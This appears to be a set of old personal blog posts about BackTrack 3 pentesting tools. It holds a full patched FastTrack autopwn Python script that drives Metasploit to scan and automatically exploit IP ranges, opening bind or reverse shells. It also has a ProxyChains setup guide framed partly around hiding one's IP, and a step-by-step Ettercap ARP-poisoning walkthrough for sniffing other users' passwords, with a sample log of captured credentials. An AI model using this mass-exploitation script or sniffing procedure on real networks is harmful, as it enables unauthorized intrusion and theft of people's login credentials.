Seems like there’ve been some minor changes in the MetaSploit Framework 3. One of the effects is that the the Autopwn Automation of FastTrack is not working. Running the script gives the following error:

.
.
msf > load db_sqlite3
[-]
[-] The functionality previously provided by this plugin has been
[-] integrated into the core command set. Use the new ‘db_driver’
[-] command to use a database driver other than sqlite3 (which
[-] is now the default). All of the old commands are the same.
[-]
[-] Failed to load plugin from /opt/metasploit3/msf3/plugins/db_sqlite3: Deprecated plugin
msf > db_driver sqlite3
[*] Using database driver sqlite3

One solution is to open up the Msfconsole and type the commands manually. But that kind of defeats the purpose of having FastTrack installed (in a limited way of course:p ). Fortunately, the fix is very easy. All you need to do is to modify the autopwn file in /pentest/exploits/fasttrack/bin/ftsrc directory. First open the file in any text editor of your choice and look for this line in bold:

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘load db_sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)

Now replace db_sqlite3 with db_driver sqlite3 and save the file.
Everything will work fine.

Alternatively you can copy-paste the following text in a text editor and save the file as “autopwn.py” (minus quotes) in directory /pentest/exploits/fasttrack/bin/ftsrc . You’ll need root access to replace the already existing file.

#!/usr/bin/env python
import pexpect,sys,os,time
try:
import psyco
psyco.full()
except ImportError:
pass
definepath=os.getcwd()
try:
ipaddr=sys.argv[3]
except IndexError:
ipaddr=raw_input(“””
Metasploit Autopwn Automation

http://www.metasploit.com

This tool specifically piggy backs some commands from the Metasploit Framework and does
not modify the Metasploit Framework in anyway. This is simply to automate some tasks
from the autopwn feature already developed by the Metasploit crew.

Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254 or 192.168.1.1/24
or whatever you want and it’ll run against those hosts. Additionally you can place NMAP
commands within the autopwn ip ranges bar, for example, if you want to scan even if a
host “appears down” just do -PN 192.168.1.1-254 or whatever…you can use all NMap
syntaxes in the Autopwn IP Ranges portion.

When it has completed exploiting simply type this:

sessions -l (lists the shells spawned)
sessions -i (jumps you into the sessions)

Example 1: -PN 192.168.1.1
Example 2: 192.168.1.1-254
Example 3: -P0 -v -A 192.168.1.1
Example 4: 192.168.1.1/24

Enter the ip ranges to autopwn: “””)
if ipaddr == ‘quit’ or ipaddr == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
# Spawn instance of msfconsole
try:
option1=sys.argv[4]
except IndexError:
option1=raw_input(“””
Do you want to do a bind or reverse payload?

Bind = direct connection to the server
Reverse = connection originates from server

1. Bind
2. Reverse

Enter number: “””)
if option1 == ‘quit’ or option1 == ‘q’:
print “nnExiting Fast-Track autopwn…nn”
sys.exit()
if option1 == ‘1’: option1=’-b’
if option1 == ‘2’: option1=’-r’
print “Launching MSFConsole and prepping autopwn…”
try:
counter=0
metapath=file(“%s/bin/setup/metasploitconfig.file” % (definepath)).readlines()
for line in metapath:
metapath=line.rstrip()
except IOError:
print “Configuration file not detected, running default path.”
print “Recommend running setup.py install to configure Fast-Track.”
print “Setting default directory…”
counter=0
# BT3
if os.path.isfile(“/pentest/exploits/framework3/msfconsole”):
metapath=”/pentest/exploits/framework3/”
counter=1
# NUbuntu
if os.path.isfile(“/tools/exploits/framework*/msfconsole”):
metapath=”/tools/exploits/framework*/”
counter=1
if counter == ‘0’:
print “Metasploit not detected..Exiting..”
sys.exit()

try:
child1 = pexpect.spawn(‘%smsfconsole’ % (metapath))
# load sqlite3
child1.sendline (‘db_driver sqlite3’)
# Destroy database
child1.sendline (‘db_destroy pentest’)
# Create database
child1.sendline (‘db_create pentest’)
# run actual port scans
child1.sendline (”’db_nmap %s ”’ % (ipaddr))
# run actual exploitation
child1.sendline (‘db_autopwn -p -t -e %s’ % (option1))
child1.sendline (‘sleep 5’)
child1.sendline (‘jobs -K’)
child1.sendline (‘nnn’)
child1.sendline (‘sessions -l’)
child1.sendline (‘echo “If it states No sessions, then you were unsuccessful. Simply type sessions -i to jump into a shell”‘)
# jump to pid
child1.interact()
except Exception: print “nExiting Fast-Track…n”

There are probably dozens of programs on any OS that don’t have any option for using proxies. Many common command line tools like ping, traceroute don’t work if the network you are on, forces you to use a proxy. Finally found a way to specify a proxy for these programs . ProxyChains  is one very good tool that enables you to use a proxy for not only specifying a path to outside networks but also use anonymous proxies for your privacy. 

 It’s quite simple to install and use. First download and install the script. 

Then navigate to /etc folder and open proxychains.conf file in any text editor of your choice. It should look like this.

# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
#dynamic_chain
#
# Dynamic – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
strict_chain
#
# Strict – Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random – Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)

# Make sense only if random_chain
#chain_len = 2

# Quiet mode (no output from library)
#quiet_mode

# Proxy DNS requests – no leak for DNS data
proxy_dns 

# Some timeouts in milliseconds
tcp_read_time_out 15000
tcp_connect_time_out 8000

# ProxyList format
# type host port [user pass]
# (values separated by ‘tab’ or ‘blank’)
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080 
#  
#
# proxy types: http, socks4, socks5
# ( auth types supported: “basic”-http “user/pass”-socks )
#
[ProxyList]
# add proxy here …
# meanwile
# defaults set to “tor”
http 10.123.137.1 8080
socks4 111.44.45.31 80

Now depending upon your network configuration, you’ll need to add proxies to this file. If you’re on a network that routes all data through a proxy server, then replace the bold green text with the type of proxy (http, socks4,5 ), ip address and port number. Separate each field by a TAB. That’ll be enough for you to force your programs to use your network’s proxy.

But if  you want to use another proxy for any purpose including hiding your ip, you can add other proxies along with their type and port number same way as previous one. (Red bold text). Additionaly you may have to add username and password if the proxy server requires so.

Notice the options #dynamic_chain, #strict_chain and #random_chain . 
Removing the # sign from any one of these 3 specifies the order in which the proxies are to be used. In this example I’m using strict_chain option, though dynamic_chain will also work.

Save the file and exit from text editor. Now it’s time to see it in action. Open up your command line and type proxychains before the program name to force it to use your proxylist. 

user~# proxychains program

As simple as that :)

This is probably the easiest way to “hack” various passwords including email. All you need is ettercap.
It’s a easy to use GUI based sniffer. (Good news for people scared of command line).
Download and install the software on your PC from this link. Only source packages are available. Instructions for running on a Windows platform are here. I’ve not tried that yet.
For this hack to work, your PC needs to be on the network. You can’t do it from outside.

First click on Sniff –> Unified Sniffing

Then click on Hosts and input the list of hosts you want to snoop on. You can either feed a list of ips or let ettercap select online hosts in your subnet. I tried sniffing on hosts outside my subnet,(there is a reason why I had this idea of sniffing ) but that hasn’t worked well yet.

Click on Mitm (for newbies, MITM stands for Man In the Middle) and click on ARP poisoning. On next box, select Sniff remote connections

Click on Start –> Start Sniffing.

Now keep an eye on the output screen as the users login to websites. Their login details are displayed in plain text. :D

In case you don’t see anything, you may need to do a bit of work. Find the file ettercap.conf and remove the # sign from last two lines below.

# if you use iptables:
#redir_command_on = “iptables -t nat -A PREROUTING -i %iface -p tcp –dport $
#redir_command_off = “iptables -t nat -D PREROUTING -i %iface -p tcp –dport$

ettercap.conf file is placed in /usr/local/etc.

Here is a sample of what I captured on one of my networks. Details have been changed to protect the innocents. :P

Listening on eth0… (Ethernet)

eth0 -> 00:A2:81:99:BA:01 10.17.167.60 255.255.255.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services
Randomizing 255 hosts for scanning…
Scanning the whole netmask for 255 hosts…
26 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

HTTP : 10.17.167.24:8080 -> USER: a23bb2-dc2d-4435-be54-cbf8a64431cb PASS: HTRnheQp INFO: http://online.speedbit.com/online/update.aspx?CV=1.1.0.6&
DHCP: [00:0D:60:9F:10:0E] REQUEST 10.17.167.188
DHCP: [10.17.167.1] ACK : 10.17.167.188 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “smtup.com”
POP : 10.17.166.21:110 -> USER: user.one PASS: mypass1234
HTTP : 116.143.123.122:80 -> USER: 4f3ab8b2-dc2d-c245-a654-0ca8a64431cb PASS: nRHh6Pq INFO: online.speedbit.com/
DHCP: [10.17.167.1] ACK : 10.17.167.169 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.2 “mydomain.com”
HTTP : 202.137.234.20:80 -> USER: mantris PASS: yourpass INFO: http://www.rediff.com
DHCP: [00:23:E6:1B:FD:7F] REQUEST 10.17.16.69
DHCP: [10.17.16.1] ACK : 10.17.167.69 255.255.255.0 GW 10.17.167.1 DNS 10.17.172.3 “mydomain.com”
HTTP : 10.17.16.24:8080 -> USER: kaykay PASS: batman INFO: http://www.rediff.com/index.html

Do not misuse this information. I use this tool only to monitor traffic for illegal activities on my network.

Greets: remote-exploit.org

I installed BackTrack 3 on my PC at work. Installing it in a dual boot configuration along with XP proved to be a nightmare. Messed up my XP partition once and was unable to get dual boot working properly. It’d work fine for 2-3 days and then mess up.  At first it was LILO giving crazy errors and garbled text, so I  followed instructions posted by GoodGirl in Remote Exploit forums and installed GRUB.I don’t know if it really worked for people who posted there thanking her, but that tutorial has many errors.
 Using BackTrack 3 hasn’t proved to be a good experience either. It has quite a few bugs, or maybe its just the under powered PC I have here (256MB RAM only). My list of annoyances:
1) Linux is fast. Much faster than Windows with little lag times and programs almost never  hanging up. But BT 3 is an exception. Its very slow, running 2-3 programs simultaneously is sure way to slow down or crash everything. I’ve installed this OS 2 times with different images. (USB one)
2)  We have a proxy here.  I tried my best but was unable to get any program except browsers and chat clients to use the proxy for accessing external networks. Updating doesn’t work either. I’m unable to find a  proxy setting for system like there is one for Windows services.  Wise guys at RE forums had their own ethicaly White Hat views on this.
3) Compiz Fusion is a complete dud. Themes don’t work properly. Not to mention you can’t download new themes due to proxy restriction. Maybe its due to low RAM.
4) Mouse has gone crazy. It cannot differentiate between single and double clicks. I tried almost everything in Mouse settings, increasing/decreasing sentivity, lag time, changing themes. But its stuck. Sometimes my clicks get recognised as single at other times they are double. You can guess the results. Same mouse works fine in XP.
5) GUI installation has been removed. Now its back to command line installation. You can copy the installation script,  bt3.kmdr file from older distros for graphical intall though. Here is the file. Some senior members say that they prefer people to use thumbdrives for running BT 3. Why’d anybody use thumbdrives if they can install on HDD except in rare cases?
BT 3 Beta and even XP are a lot better than this (except for proxy). I’m still using BT 3 Beta on my home PC. No use taking chances with all that data there.

Using linux (BackTrack) is proving to be a real learning expereince. I always wanted to use Linux instead of Windows as my  primary OS. I tried shifting to linux many times in the past. tried using Xandros, Ubuntu, Red Hat and some more flavours. but couldnt get anything done with them. Not that they were particularly bad. Main reason was lack of a relable internet connection.
Nowadas with a good net connection, anytime am stuck with something I just search it on any search engine (Google mostly) and more often than not I have the solution within miniutes.
I was unable to do so earlier without internet.
Nowadays almost every Linux distro based on ny platform supports almost every hardware straight out of the box, but still many times you need to dowload some file  to make something work.
In my case, I havent been able to use my RTL8139 chpset NIC work :-|
Not that I particularly need it. Onboard card works well without a hitch..but still I’d like  it to work,. Just for the sake of challange

:D

I’ve downloaded and successfully installed many good software,
list includes
VMware (server and player , both free)
Opera Browser
Some misc system software including Wine, sqlite3, postgres and many more.
Currently downloading OpenOffice. I hope it’ll install fine without  givingmuch trouble now
Finally learnt to use multiple desktop option.
Still some stuff proves o be quite difficult

Games for one. No windows game will work  here.
Sometimes, some games seem to  work with Wine, but they crash soon. Updating the software to a newer version was of  no help.

Then  tried installing Cedega, but waas put off by their ridiculous  5 Euro per month subscription fee. Thats too much to pay  in any case.
Then I tried installing the free version, Cedega CVS. After going through numerous guides, installing dozens of packages am still unable to run any game.

To top that, BackTrack lacks support for multi-channel sound.

Enquiring about these issues in BT forum gives response, “This is a pen-testing distro. Not meant for games, music etc” :|
Well., I can understand that, but even with a pen test distro, a person sometimes will really like to use it as his/her primary OS.  This point aparently escaped the notice of the BT people.
Not much use of complaiing. They’vce made and released this excellent OS for free afterall.

My windows installation still stays..for games only.  :